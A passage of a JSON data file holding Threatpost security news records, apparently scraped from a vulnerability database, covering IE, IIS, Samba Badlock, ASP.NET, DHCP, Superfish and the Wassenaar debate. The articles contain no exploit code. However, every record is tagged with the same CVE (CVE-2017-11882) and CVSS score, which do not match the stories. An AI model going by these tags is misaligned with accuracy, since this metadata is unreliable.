lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:03", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053837/microsoftsecurity.jpg)](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>)\n\nA security researcher from nCircle is accusing Microsoft of gamesmanship in its description of an unpatched IIS vulnerability in the way the WebDAV extension decodes a requested URL. The end result is that a successful exploit would allow a hacker to bypass authentication and gain unauthorized access to resources.\n\n\u201cMicrosoft has classified this issue two different ways in two different places,\u201d he said. \u201c[On the SRD blog ](<http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx>)(it) refers to this as a Information Disclosure vulnerability, while [the Microsoft Advisory ](<http://www.microsoft.com/technet/security/advisory/971492.mspx>)refers to this as an elevation of privilege,\u201d says nCircle\u2019s Tyler Reguly.\n\nThe point, he said, is that the bug should be called what it is\u2013an access control breach or an authentication bypass. SRD acknowledges the Authentication Bypass but downplays it because you are accessing a single page with the anonymous user privileges, he added.\n\n[Read the full story](<http://securitywatch.eweek.com/browsers/security_researcher_microsoft_downplaying_iis_vulnerability.html?kc=rss>) [eweek.com]\n\nHere\u2019s [our previous coverage](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>) of this issue.\n", "cvss3": {}, "published": "2009-05-21T00:03:55", "type": "threatpost", "title": "Microsoft accused of downplaying IIS flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "href": "https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/72754/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:35", "description": "Despite the [Badlock hype machine](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>) cranked up high, we don\u2019t know much about this impending soul-crushing vulnerability other than it could be bad, it could be in the Windows Server Message Block and it already has its own requisite logo and website.\n\nNonetheless, we have a little more than two weeks before the next Microsoft Patch Tuesday on April 12 to speculate, guess and fear what might come first: the patch or a public exploit.\n\nStefan Metzmacher, a member of the Samba team and an employee with German consultancy SerNet, is credited with finding the bug and said both Samba and Windows will be patched. He said deductive reasoning leads us to consider that the bug might be in Server Message Block (SMB). Samba is an open source SMB implementation.\n\nBug hunters, good and bad, are surely on the case and some have already found what could be a juicy clue in one of Metzmacher\u2019s [commits to git.samba.org](<https://git.samba.org/?p=samba.git;a=blob;f=source4/libcli/smb2/lock.c;h=f2a76d876a103ce0dd06a5b362c2e629974772d5;hb=HEAD>). Metzmacher is the author of the lock.c file in Samba\u2014it handles SMB2 client lock handling\u2014and within a particular commit he includes a comment: \u201d /* this is quite bizarre \u2013 the spec says we must lie about the length! */\u201d\n\nThere\u2019s no confirmation this is the bug, but one researcher told Threatpost that the comment indicates that there are places in the protocol where the size of a string would be misrepresented. This could lead to serious errors because a developer could use the size to allocate space in a buffer, which is fine if the number is accurate. But if the length is a \u201clie\u201d as Metzmacher says, and you copy more bytes than there is room allocated, you have a buffer overrun and code execution.\n\nWhether this is enough information there for an exploit writer to craft something nasty in the next two weeks remains to be seen. One thing is for certain, however: defenders will sway in the wind for the next 15 days.\n\n\u201cA skilled exploit writer may have enough information to write an exploit based on this information. On the other hand, as a defender, I am missing some details,\u201d said Johannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center. \u201cFor example, it would be nice to know if this affects servers only, or clients as well. Which network ports and which SMB version are affected? These are things that would help defenders, but they are missing from the advisory.\u201d\n\nThe [Badlock website](<http://badlock.org/>) isn\u2019t helpful on details either, other than to say that patches will be available for Samba 4.4, 4.3 and 4.2; it cautions that since Samba 4.4.0 was released March 22, Samba 4.1 will no longer be supported.\n\nThe SANS website, meanwhile, cautions that UNIX administrators need to pay attention to the details once they\u2019re made public, and suggest [scanning environments](<https://isc.sans.edu/diary/Getting+Ready+for+Badlock/20877>) for servers with SMB enabled; it\u2019s expected that UNIX implementations would also patch on or around the April 12.\n\nIn the meantime, the situation has also stirred up a healthy debate over whether big bugs are being trivialized, not only by self-serving advanced notification, but also by websites and branding with logos.\n\nFrom Badlock.org:\n\n> \u201cThe main goal of this announcement is to give a heads up and to get you ready to patch all systems as fast as possible and have sysadmin resources available on the day the patch will be released. Vendors and distributors of Samba are being informed before a security fix is released in any case. This is part of any Samba security release process.\n> \n> Weighting to the respective interests of advance warning and utmost secrecy we chose to warn you beforehand, so that everyone has a chance to be ready to install the fixes as soon as they are available. Once the patch is released to the public, it will point to attack vectors and exploits will be in the wild in no time.\u201d\n\nMicrosoft has chosen not to add anything to the discussion; a representative told Threatpost: \u201cUnfortunately, Microsoft doesn\u2019t have anything to share.\u201d Sernet CEO Johannes Loxen refused to comment further in an email to Threatpost beyond what is on the badlock.org side. Loxen did concede in a tweet that the advanced notification on the bug is self-serving in terms of marketing and attention toward his company. The tweets have since been deleted.\n\nDan Kaminsky, whose 2008 DNS vulnerability and patch coordination is largely considered the first of its kind, was critical of the hype. He told _Wired_ that this [type of disclosure](<http://www.wired.com/2016/03/hype-around-mysterious-badlock-bug-raises-criticism/>) isn\u2019t helpful to admins. \u201cWhat\u2019s the call to action other than to pay attention?\u201d\n\nAndrew Storms, vice president of security services at New Context, recalled the angst for some around Microsoft\u2019s decision of last January to discontinue Patch Tuesday advanced notification and limit it only to [paying Premier customers](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/>).\n\n\u201cI\u2019ve always been a proponent of the advanced notification. And I was one of the people upset when Microsoft closed up ANS. That few days of heads up gives managers a chance to prep resources,\u201d Storms said. \u201cWhether that\u2019s people or servers or test systems, I\u2019ve always contended that some heads up is better than the big surprise disruption.\u201d\n\nSANS\u2019 Ullrich said advanced notification allows for preparation in areas such as inventories of vulnerable systems, counter measures and configuration options, all of which speed up patching. \n\u201c\u2018Branded\u2019 vulnerabilities are likely patched faster and more organizations will patch them given the attention paid to them (it would be nice to collect some hard numbers on this, but I haven\u2019t seen any studies to that effect yet),\u201d Ullrich said. \u201cOn the other hand, \u2018branded\u2019 vulnerabilities should be reserved for the most severe vulnerabilities. In that way, we will have to see if this vulnerability does meet that threshold.\u201d\n", "cvss3": {}, "published": "2016-03-28T11:45:05", "type": "threatpost", "title": "Badlock Bug in Samba SMB Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-12T18:50:16", "id": "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "href": "https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "Prompted by the disclosure of a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-working-on-patch-for-ie-8-zero-day/106247>) more than six months after it was reported, Microsoft next Tuesday will finally issue a patch.\n\nHP\u2019s Zero Day Initiative (ZDI) released on May 21 some detail on a previously unreported use-after-free bug in IE 8. No public exploits were reported and while Microsoft acknowledged receipt of the vulnerability report from ZDI, it had not produced a patch prior to ZDI\u2019s disclosure per its guidelines.\n\nThe vulnerability affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cSome fixes are more complex than others, and we must test every one against a huge number of programs, applications and different configurations,\u201d a Microsoft spokesperson said. \u201cWe continue to encourage customers to upgrade to a modern operating system, such as Windows 7 or 8.1, and run the latest version of Internet Explorer which include further protections.\u201d\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s Patch Tuesday security updates.\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s [Patch Tuesday security updates.](<https://technet.microsoft.com/en-us/library/security/MS14-JUN>) There will be seven bulletins in all, five rated important by the company. The IE patch will likely be a cumulative rollup as it affects the browser all the way back to IE 6 on Windows Server 2003.\n\nThe second critical bulletin is also a remote code execution vulnerability, this one in Microsoft Office and Microsoft Lync, the company\u2019s messaging and video conferencing application. The vulnerability is rated critical for Lync 2013 and 2010, as well as Live Meeting 2007 Console; it is rated important for Microsoft Office 2010 and Office 2007.\n\n\u201cGiven that the second bulletin will affect Lync Server and the older Live Meeting Console this may be a truly remotely exploitable vulnerability,\u201d said Ross Barrett, senior manager of security engineering at Rapid7.\n\nWindows Server 2003, it should be noted, has nearly entered its last year of support; it\u2019s scheduled to go end-of-life in July 2015.\n\n\u201cWe are coming up on just a year out now and because any changes to your server will likely be a significant amount of work, it isn\u2019t too soon to get started on that plan,\u201d said Russ Ernst, director, product management, Lumension.\n\nThe remaining bulletins, all rated important, include a remote code execution bug in Office, separate information disclosure vulnerabilities in Windows and Lync Server, a denial-of-service vulnerability in Windows, and a tampering vulnerability in Windows.\n\n\u201cThe tampering label on the seventh bulletin may suggest it allows a message to be altered in transit,\u201d Barrett said. \u201cProbably a limited scenario for exploitation.\u201d\n", "cvss3": {}, "published": "2014-06-05T14:30:33", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-10T18:53:57", "id": "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "href": "https://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, or the Dynamic Host Configuration Profile, automates the assignment of IP hosts with IP addresses and configuration information. Its used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workaround available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:54", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060101/micro_patch1.jpg)](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>)Microsoft has released the emergency out-of-band patch for the [ASP.NET padding oracle attack](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>), less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina. \n\nThe patch for the ASP.NET bug is only available through [Microsoft\u2019s Download Center](<https://www.microsoft.com/downloads/en/default.aspx?pf=true>) right now, but the company plans to push it out over Windows Update and Windows Server Update within a few days, as well. \n\n\u201cFor customers who use Automatic Updates, the update will be \nautomatically applied once it is released broadly. Once the Security \nUpdate is applied, customers are protected against known attacks related \nto Security Advisory 2416728,\u201d said Dave Forstrom, director of Trustworthy Computing at Microsoft. \n\nThe company will hold a [live webcast](<https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032464130&EventCategory=4&culture=en-US&CountryCode=US>) at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release. \n\nThe ASP.NET vulnerability first game to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, [discussed the bug and their technique for exploiting it](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>). The attack itself is an implementation of an existing technique developed several years ago to exploit weaknesses in crypto implementations.\n\n\u201cWe knew ASP.NET was vulnerable to our attack several months ago, but we \ndidn\u2019t know how serious it is until a couple of weeks ago. It turns out \nthat the vulnerability in ASP.NET is the most critical amongst other \nframeworks. In short, it totally destroys ASP.NET security,\u201d said Duong, when discussing the attack. \u201cIt\u2019s worth noting that the attack is 100% reliable, i.e. one can be \nsure that once they run the attack, they can exploit the target. It\u2019s \njust a matter of time. If the attacker is lucky, then he can own any \nASP.NET website in seconds. The average time for the attack to complete \nis 30 minutes. The longest time it ever takes is less than 50 minutes.\u201d\n\nLast week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don\u2019t protect against the attack, just one version of it.\n\nMicrosoft didn\u2019t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an [out-of-band patch](<https://threatpost.com/attacks-escalate-microsoft-ships-emergency-windows-patch-080210/>) for the original bug that was identified as part of the Stuxnet malware attack. \n", "cvss3": {}, "published": "2010-09-28T18:12:43", "type": "threatpost", "title": "Microsoft Pushes Emergency Patch For ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:24:17", "id": "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "href": "https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/74525/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:27", "description": "[![Microsoft patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064740/micro_patch_7.jpg)](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>)Microsoft has patched a serious vulnerability in the Windows TCP/IP stack that, under some conditions, could enable an attacker to run code on remote machines. The flaw lies in the way that the stack handles large amounts of specially formatted packets sent to a vulnerable machine.\n\nMicrosoft officials said that the vulnerability, which is one of a handful of flaws fixed by the company in November\u2019s Patch Tuesday release, is a serious one, but that the scenarios in which it can be exploited for remote code execution are limited. The vulnerability crops up when an attacker sends a large volume of crafted UDP packets to a machine on a port that doesn\u2019t have any service listening on it.\n\n\u201cWhile processing these network packets it is observed that some used structures are referenced but not dereferenced properly. This unbalanced reference counting could eventually lead to an integer overflow of the reference counter,\u201d [Microsoft\u2019s SWIAT team](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>) said in a blog post on the vulnerability.\n\nIn order for the bug to be exploitable, some specific conditions need to be present. If a dereference happens immediately after the counter has gone back to zero, Windows will free the structure. If that happens, there are four things that can occur, Microsoft said: \n\u2022 The memory is still mapped and contains the old data. No crash results and the system works as normal. \n\u2022 The memory is unmapped and the system crashes when it is referenced. This results in a system denial-of-service. \n\u2022 The memory is re-allocated for the same structure. No crash results and the system works as normal. \n\u2022 The memory is re-allocated for a different structure. This could result in a system crash, or if attacker-controlled data is present, could lead to memory corruption or remote code execution.\n\nThe last scenario in the list is the one that could lead to remote code execution, the company said.\n\n\u201cWhile the last scenario can theoretically lead to RCE, we believe it is difficult to achieve RCE using this vulnerability considering that the type of network packets required are normally filtered at the perimeter and the small timing window between the release and next access of the structure, and a large number of packets are required to pull off the attack,\u201d Microsoft\u2019s team said.\n", "cvss3": {}, "published": "2011-11-09T15:20:26", "type": "threatpost", "title": "Microsoft Patches Critical Bug in Windows TCP/IP Stack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:23", "id": "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "href": "https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/75872/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:57", "description": "Microsoft has taken steps to impede the next Superfish from impacting users.\n\n[Superfish was pre-installed adware](<https://threatpost.com/lenovo-superfish-certificate-password-cracked/111165/>) found on new Lenovo laptops earlier this year. The software exposes users to man-in-the-middle attacks because of the way it injects advertisements into the browser. It comes with a self-signed root cert that generates certs for HTTPS connections, replacing existing certs with its own in the process. Attackers could take advantage of this scenario\u2014especially after the password for the cert that shipped with Superfish was found\u2014to listen in on encrypted communication.\n\nMicrosoft this week said it has [updated its rules around adware](<https://blogs.technet.microsoft.com/mmpc/2015/12/21/keeping-browsing-experience-in-users-hands/>), and now such programs that build ads in the browser are required to only use the browser\u2019s \u201csupported extensibility model for installation, execution, disabling and removal.\u201d Microsoft said starting March 31, 2016 it will detect and begin removing programs that are not in compliance.\n\n\u201cThe choice and control belong to the users, and we are determined to protect that,\u201d wrote Barak Shein and Michael Johnson of Microsoft\u2019s Malware Protection Center.\n\nLenovo quickly patched the original Superfish issue and shortly thereafter, browser makers such as [Mozilla removed the root cert from Firefox\u2019s trusted root store](<https://threatpost.com/mozilla-pushes-hot-fix-to-remove-superfish-cert-from-firefox/111335/>).\n\nSuperfish\u2019s ability to perform SSL interception by proxy was certainly worrisome behavior from a supposedly trusted product, one that was suddenly opening the door not only to man-in-the-middle attacks, but also the manipulation of DNS settings and other network-layer attacks. Worse yet was that Superfish-like software would not trigger warnings about man-in-the-middle attacks.\n\n\u201cAll of these techniques intercept communications between the Internet and the PC to inject advertisements and promotions into webpages from outside, without the control of the browser,\u201d Microsoft said. \u201cOur intent is to keep the user in control of their browsing experience and these methods reduce that control.\u201d\n", "cvss3": {}, "published": "2015-12-23T09:01:25", "type": "threatpost", "title": "Microsoft Bans Superfish SSL Interception Adware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-12-23T14:01:25", "id": "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "href": "https://threatpost.com/microsoft-to-remove-superfish-like-programs-starting-in-march/115730/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "description": "When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser.\n\nA team of experts from HP\u2019s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they\u2019d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense.\n\nA chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs.\n\n\u201cWe were very excited when we heard the results from Microsoft,\u201d Gorenc, ZDI lead researcher, said. \u201cWe put a lot of time and effort into that research. We\u2019re glad to hear Microsoft got good data out of it.\u201d\n\nGorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR).\n\n\u201cWe use one mitigation to defeat another,\u201d he said. \u201cStuff like this has been done in the past, but what\u2019s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we\u2019ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.\u201d\n\nUse-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when memory allocated to a pointer has been freed, allowing attackers to use that pointer against another area in memory where malicious code has been inserted and will be executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part[, bypasses of and attacks against mitigations have largely been confined to researchers and academics](<http://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570>), but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. Operation Snowman, for example, an APT operation against military and government targets, [scanned for the presence of EMET and would not execute](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) if the tool was detected.\n\nInternet Explorer has been plagued by [memory corruption bugs](<http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175>) forever it seems, with Microsoft releasing almost [monthly cumulative updates for the browser](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) which is constantly being used in targeted attacks and has been easy pickings for hackers.\n\n> ZDI said it will donate the full Microsoft bug bounty to three institutions that sponsor strong STEM programs.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fie-memory-attacks-net-zdi-125000-microsoft-bounty%2F110876%2F&text=ZDI+said+it+will+donate+the+full+Microsoft+bug+bounty+to+three+institutions+that+sponsor+strong+STEM+programs.>)\n\n\u201cThe attack surface is valuable and has to exist,\u201d Gorenc said of IE and use-after-free bugs. \u201cIt\u2019s an attack surface where with slight manipulations, you can gain code execution on the browser.\u201d\n\nZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million dollars over the past nine years buying vulnerabilities.\n\nGorenc\u2019s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. For these attacks, Zuckerbraun [reverse engineered MemProtect](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Efficacy-of-MemoryProtection-against-use-after-free/ba-p/6556134#.VNNkLC60CL0>), studying how it stymied use-after-free vulnerabilities. Hariri focused on [bypassing Isolated Heap](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/HP-Security-Briefing-episode-18-New-directions-in-use-after-free/ba-p/6659998#.VNNkNS60CL0>). Together with Gorenc\u2019s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft.\n\nThe reward, meanwhile, will be donated to the three education institutions, each of which have personal meaning to the respective researchers and their focus on STEM.\n\n\u201cHP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,\u201d Gorenc said. \u201cWe look at it as a way to give back. Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.\u201d\n", "cvss3": {}, "published": "2015-02-05T10:19:00", "type": "threatpost", "title": "IE Memory Attacks Net ZDI $125,000 Microsoft Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-12T17:07:39", "id": "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "href": "https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the 